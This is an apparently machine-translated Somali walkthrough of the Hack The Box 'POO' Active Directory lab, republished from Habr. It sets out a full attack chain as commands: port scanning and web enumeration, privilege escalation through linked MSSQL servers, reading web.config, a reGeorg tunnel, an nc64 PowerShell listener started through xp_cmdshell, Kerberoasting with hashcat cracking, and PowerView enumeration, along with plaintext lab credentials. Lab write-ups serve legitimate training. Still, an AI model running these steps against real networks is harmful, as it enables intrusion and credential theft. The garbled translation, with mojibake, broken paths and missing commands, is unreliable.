Maqaalkan, waxaan ku falanqeyn doonaa marinka mashiinka kaliya, laakiin shaybaar yar oo dhan oo ka socda goobta
Sida lagu sheegay sharraxaadda, POO waxaa loogu talagalay in lagu tijaabiyo xirfadaha dhammaan marxaladaha weerarrada ee jawiga Hagaha Firfircoon ee yar. Hadafku waa in la dhimo martigeliyaha la heli karo, la kordhiyo mudnaanta, iyo ugu dambayntii la dhimo domainka oo dhan iyadoo la ururinayo 5 calan habka.
Xidhiidhka shaybaadhka waa VPN. Waxaa lagugula talinayaa inaadan ka xirmin kumbuyuutarka shaqeynaya ama martigeliyaha halkaasoo xog muhiim ah kuugu jirto, marka aad gasho shabakad gaar ah oo leh dadka wax ka yaqaan amniga macluumaadka π
macluumaadka ururka
Si aad wax uga ogaato maqaallo cusub, software iyo macluumaad kale ayaan sameeyay
Dhammaan macluumaadka waxaa loo bixiyay ujeeddooyin waxbarasho oo keliya. Qoraaga dukumeentigu ma qaadayo wax mas'uuliyad ah waxyeello kasta oo qof u geysata taasoo ka dhalatay adeegsiga aqoonta iyo hababka lagu helay natiijada daraasadda dukumeentigan.
Intro
Ciyaartan dhamaadka ah waxay ka kooban tahay laba mishiin waxayna ka kooban tahay 5 calan.
Sifeynta iyo ciwaanka martigeliyaha jira ayaa sidoo kale la bixiyaa.
ΠΡΠ½Π΅ΠΌ!
Calan dib u habeyn
Mashiinkaani wuxuu leeyahay ciwaanka IP-ga ee 10.13.38.11 kaas oo aan ku daro /etc/hosts.
10.13.38.11 poo.htb
Talaabada ugu horeysa waa in la sawiro dekedaha furan. Maadaama ay wakhti dheer qaadanayso in lagu sawiro dhammaan dekedaha leh nmap, waxaan marka hore ku samayn doonaa masscan. Waxaan ka baaranaa dhammaan dekedaha TCP iyo UDP ee tun0 interface ee 500pps.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Hadda, si aad u hesho macluumaad faahfaahsan oo ku saabsan adeegyada ku shaqeeya dekedaha, aynu ku wadno iskaanka ikhtiyaarka -A.
nmap -A poo.htb -p80,1433
Markaa, waxaanu haynaa adeegyada IIS iyo MSSQL. Xaaladdan oo kale, waxaan ogaan doonaa magaca DNS dhabta ah ee domainka iyo kombiyuutarka. Seerfarka shabakadda, waxa nalagu salaamay bogga guriga IIS.
Aynu ku celcelinno hagayaasha. Tan waxaan u isticmaalaa gobuster Halbeegyada waxaan ku cadeynayaa tirada durdurrada 128 (-t), URL (-u), qaamuuska (-w) iyo kordhinta na danaysa (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Markaa, waxaanu haynaa xaqiijinta HTTP ee hagaha/adminka, iyo sidoo kale faylka kaydinta adeega miiska .DS_Store oo diyaar ah. DS_Store waa faylal u kaydiya habaynta isticmaalaha galka, sida liiska faylalka, goobta summada, sawirka asalka ee la doortay. Faylka noocaan ah waxaa laga yaabaa inuu ku dhammaado hagaha server-ka shabakadda ee horumariyeyaasha shabakadda. Sidaa darteed, waxaan helnaa macluumaadka ku saabsan waxa ku jira hagaha. Tan waxaad u isticmaali kartaa
python3 dsstore_crawler.py -i http://poo.htb/
Waxaan helnaa waxa ku jira hagaha. Waxa ugu xiisaha badan halkan waa buugga / dev, kaas oo aan ka arki karno ilaha iyo faylasha db ee laba laamood. Laakiin waxaan isticmaali karnaa 6-da xaraf ee ugu horreeya ee magacyada faylka iyo hagaha haddii adeeggu u nugul yahay Magaca gaaban ee IIS. Waxaad ku hubin kartaa baylahdan adigoo isticmaalaya
Oo waxaan helnaa hal fayl qoraal ah oo ka bilaabma "poo_co". Aniga oo garan la' waxaan samayn lahaa xiga, waxaan si fudud ka doortay qaamuuska hagayaasha oo dhan erayada ku bilaabma "co".
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
Oo ku celceli wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
Oo hel erayga saxda ah! Waxaanu eegnaa faylkan, waxaanu kaydinaynaa aqoonsiga (marka lagu qiimeeyo DBNAME parameter, waxay ka yimaadeen MSSQL).
Waxaan wareejineynaa calanka, waxaana ku hormareynaa 20%.
Huh calanka
Waxaan ku xirnay MSSQL, waxaan isticmaalaa DBeaver.
Wax xiiso leh kama helin xogtan, aynu samayno tafatiraha SQL oo aynu hubino waxa isticmaalayaashu yihiin.
SELECT name FROM master..syslogins;
Waxaan leenahay laba isticmaale. Aynu eegno mudnaantayada.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
Sidaa darteed, ma jiraan wax mudnaan leh. Aynu aragno server-yada ku xiran, waxaan ku qoray farsamadan si faahfaahsan
SELECT * FROM master..sysservers;
Markaa waxaan helnaa SQL Server kale. Aynu hubino fulinta amarada seerfarkan anagoo adeegsanayna openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
Waxaan xitaa dhisi karnaa geed su'aal ah.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
Xaqiiqdu waxay tahay marka aan codsi u dirno server-ka ku xiran, codsiga waxaa lagu fuliyaa macnaha isticmaale kale! Aynu aragno macnaha isticmaale ee aanu ku wadno server-ka ku xidhan.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Oo hadda aynu aragno macnaha guud ee codsiga ka imanaya server-ka ku xidhan annaga ayaa la fuliyay!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Markaa, waa macnaha DBO oo ay tahay in uu leeyahay dhammaan mudnaanta. Aynu hubino mudnaanta haddii ay dhacdo codsi ka yimid server-ka ku xiran.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
Sida aad arki karto, waxaan leenahay dhammaan mudnaanta! Aan u samayno admin sidaan. Laakin uma ogola in ay soo maraan weydiimo furan, aynu ku samayno EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
Oo hadda waxaan ku xidhmaynaa aqoonsiga isticmaalaha cusub, dhawro xogta calanka cusub.
Calankan waanu dhiibnay oo waanu sii soconaa.
Calanka dhabarka
Aynu helno qolofka anagoo adeegsanayna MSSQL, waxaan isticmaalayaa mssqlclient ee xirmada impacket-ka.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
Waxaan u baahanahay inaan helno furaha sirta ah, iyo waxa ugu horreeya ee aan horay ula kulanay waa goobta. Sidaa darteed, waxaan u baahannahay qaabeynta server-ka shabakadda (aan suurtagal ahayn in la tuuro qolof ku habboon, sida muuqata dab-damiska ayaa shaqeynaya).
Laakiin gelitaanka waa la diiday. In kasta oo aan ka akhrin karno faylka MSSQL, waxaan kaliya u baahanahay inaan ogaano luqadaha barnaamijyada loo habeeyey. Hagaha MSSQL-na waxa aanu ku ogaanay in uu jiro Python.
Markaa dhib ma leh inaad akhrido faylka web.config.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
Iyada oo la helay shahaadooyinka, tag /admin oo soo qaado calanka.
calanka cagta
Dhab ahaantii, waxaa jira qaar ka mid ah dhibaatooyinka isticmaalka firewall-ka, laakiin markaan eegno goobaha shabakada, waxaan ogaanay in nidaamka IPv6 sidoo kale la isticmaalo!
Kudar ciwaankan /etc/hosts.
dead:babe::1001 poo6.htb
Aan mar kale sawirno martigeliyaha, laakiin markan waxa ka sarreeya IPV6.
Iyo adeegga WinRM waxaa laga heli karaa in ka badan IPV6. Aynu ku xidhno aqoonsiga la helay.
Calan ayaa miiska saaran, soo dhiib.
Calanka P00ned
Ka dib sahan ku saabsan martigeliyaha leh
setspn.exe -T intranet.poo -Q */*
Aan ku fulino amarka MSSQL.
Sidan, waxaan ku helnaa SPN isticmaalayaasha p00_hr iyo p00_adm, taas oo macnaheedu yahay inay u nugul yihiin weerar sida Kerberoasting. Marka la soo koobo, waxaan heli karnaa hashes-ka sirta ah.
Marka hore waxaad u baahan tahay inaad hesho qolof deggan adoo metelaya isticmaalaha MSSQL Laakiin maadaama aan xaddidnayn gelitaanka, waxaan xiriir la leenahay martigeliyaha kaliya iyada oo loo marayo dekedaha 80 iyo 1433. Laakin waxaa suurtagal ah in taraafikada loo maro dekedda 80! Tan waxaan u isticmaalnaa
Laakiin marka aan isku dayno inaan galno, waxaan helnaa qalad 404. Tani waxay ka dhigan tahay in * .aspx faylasha aan la fulin. Si aad u sameyso faylasha leh kordhintan, ku rakib ASP.NET 4.5 sida soo socota.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
Oo hadda, marka la galo tunnel.aspx, waxaan helnaa jawaabta in wax walba ay diyaar u yihiin inay tagaan.
Aynu bilowno qaybta macmiilka ee arjiga, taas oo gudbin doonta taraafikada. Waxaan u gudbin doonaa dhammaan taraafikada dekedda 5432 server-ka.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
Oo waxaan isticmaalnaa proxychains si aan ugu dirno taraafikada codsi kasta iyada oo loo marayo wakiilkeena. Aan ku darno wakiilkan faylka qaabeynta /etc/proxychains.conf.
Hadda aan ku shubno barnaamijka server-ka
Hadda, iyada oo loo marayo MSSQL, waxaan bilaabeynaa dhegeystaha.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
Oo waxaynu ku xidhi karnaa wakiilkeena.
proxychains rlwrap nc poo.htb 4321
Oo aan helno xashiishka.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Marka xigta, waxaad u baahan tahay inaad ku celceliso xashiishyadan. Maadaama rockyou aadan haysan qaamuuska xogta sirta ah, waxaan isticmaalay DHAMMAAN qaamuusyada sirta ah ee lagu bixiyo Seclists. Tirinta waxaan isticmaalnaa hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
Oo waxaan ka helnaa labada ereyood ee sirta ah, kan kowaad dutch_passwordlist.txt qaamuuska, iyo kan labaad ee Keyboard-Combinations.txt.
Oo sidaas daraaddeed waxaan haynaa saddex isticmaale, waxaan u tagnaa maamulaha domain. Marka hore aan soo ogaano ciwaankiisa.
Way fiicantahay, waxaan baranay cinwaanka IP-ga ee maamulaha domainka. Aynu ogaano dhammaan isticmaalayaasha domainka, iyo sidoo kale kee baa maamule ah. Si aad u soo dejiso qoraalka si aad u hesho macluumaadka PowerView.ps1. Kadibna waxaynu ku xidhi doonaa anagoo adeegsanayna xumaan-winrm, anagoo cadaynayna tusaha iyo qoraalka ku jira halbeegga -s. Ka dibna kaliya ku shub qoraalka PowerView.
Hadda waxaan heli karnaa dhammaan howlaheeda. Isticmaalaha p00_adm wuxuu u eg yahay isticmaale mudnaan leh, markaa waxaanu ku shaqayn doonaa macnaha guud. Aan u abuurno isticmaale shay PSCRdential ah.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Hadda dhammaan amarrada Powershell halka aan ku caddeyno Creds waxaa loo fulin doonaa magaca p00_adm. Aynu soo bandhigno liiska isticmaalayaasha iyo sifada AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
Oo sidaas daraaddeed, isticmaaleyaheyga runtii waa mid mudnaan leh. Aan aragno kooxaha uu ka tirsan yahay.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Waxaan ugu dambeyntii xaqiijineynaa in isticmaaluhu uu yahay maamulaha bogga. Tani waxay siinaysaa xaqa ay u leedahay in ay meel fog ka gasho maamulaha domainka. Aan isku dayno inaan ku galno WinRM anagoo adeegsanayna tunnelkeena. Waxaan ku wareeray khaladaadka ay soo saartay reGeorg markii la isticmaalayo xumaan-winrm.
Kadib waxaan isticmaalnaa mid kale, ka sahlan
Waxaan isku daynaa inaan isku xirno, waxaana ku jirnaa nidaamka.
Laakin calan ma jiro. Markaas fiiri isticmaalaha oo hubi miisaska.
Marka mr3ks waxaan ka helnaa calanka iyo shaybaarka 100% waa la dhameeyay.
Waa intaas. Jawaab celin ahaan, faallo ka bixi haddii aad maqaalkan ka baratay wax ku cusub iyo inay waxtar kuu leedahay iyo in kale.
Waxaad nagu soo biiri kartaa
Source: www.habr.com